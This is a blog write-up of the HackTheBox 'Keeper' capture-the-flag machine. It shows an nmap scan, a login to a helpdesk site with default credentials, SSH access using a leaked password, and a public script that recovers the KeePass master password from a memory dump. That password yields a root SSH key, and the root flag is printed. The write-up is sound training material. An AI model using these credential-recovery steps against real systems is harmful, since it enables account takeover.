remoteshell.zip
Posts Tags Categories
remoteshell.zip

Contents

HTB: Keeper

 included in HTB CTF
    3 minutes 
/keeper/featured-image.jpg

Keeper is an easy HTB machine which mimicks a helpdesk. I get inital access with default credentials. With that I find a comment which reveals a password that I use to login to SSH. I then use an exploit on the KeePass dump file, which gives the root putty SSH key.

Initial enumeration

I start with an nmap scan sudo nmap -sVC -v 10.10.11.227 -oN nmap/all

It shows port 22,80 and 8000 open.


PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.10.12)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 8000

SimpleHTTPServer seems to be on port 8000, and files shown on the page.
https://i.imgur.com/3mpV4mS.png

Users flag

Here it shows the users flag!
https://i.imgur.com/SLZmARN.png
I download the other files to my linux machine, the passcodes.kdbx and KeePassDempFull.dmp files stand out (the RT30000.zip file also contain these files)
I tried to use keepass2john to bruteforce it, but no results.

I didn’t have keepass yet, so i downloaded it https://keepassxc.org/

For now I wanted to continue exploring the other ports.

Port 80

Web page shows the following
https://i.imgur.com/LCikFbg.png

I add tickets.keerper.htb to my /etc/hosts file.

It displays the following page:
https://i.imgur.com/BtPrrJf.pngAfter trying some default usernames and passwords, it lets me in with root:password.
https://i.imgur.com/2G4ka4B.png
At the users page, it shows two users.
https://i.imgur.com/THMPiXM.png

Initial password

In lnorgaard’s user page, there is a comments where it shows an initial password.
https://i.imgur.com/lrfHGw8.png

Shell as lnorgaard

I try to connect via ssh and it works!

ls -la shows that lnorgaards home directory is the same as the python http server on port 8000.
https://i.imgur.com/uqGlsho.png

Shell as root

After looking online what i could do with a KeePassDumpFull.dmp file, i stumbled upon the following github script;
https://github.com/CMEPW/keepass-dump-masterkey 


python3 poc.py ~/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp 
2023-09-01 14:07:59,930 [.] [main] Opened /home/fabian/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
				   rodgrod med flode

After googling, it showed this danish dish.
https://i.imgur.com/qV08Aif.png

With that in hand, I managed to unlock the database file!
https://i.imgur.com/TOWVnab.png

I downloaded putty for linux sudo apt install putty

Copied the notes to a file named putty_key
https://i.imgur.com/CRaDaPo.png

Then I use puttygen with -O private-openssh to specify the output type.


puttygen putty_key -O private-openssh -o new_ssh_key

using ssh with the new_ssh_key to connect as root


ssh -i ./new_ssh_key root@10.10.11.227

And I succesfully found the root flag!


root@keeper:~# cat root.txt 
e205f760f01c160cd091fec25090159c

Updated on 09 May 2024
Read Markdown
 HTBHTBHTBHTBHTB
Back | Home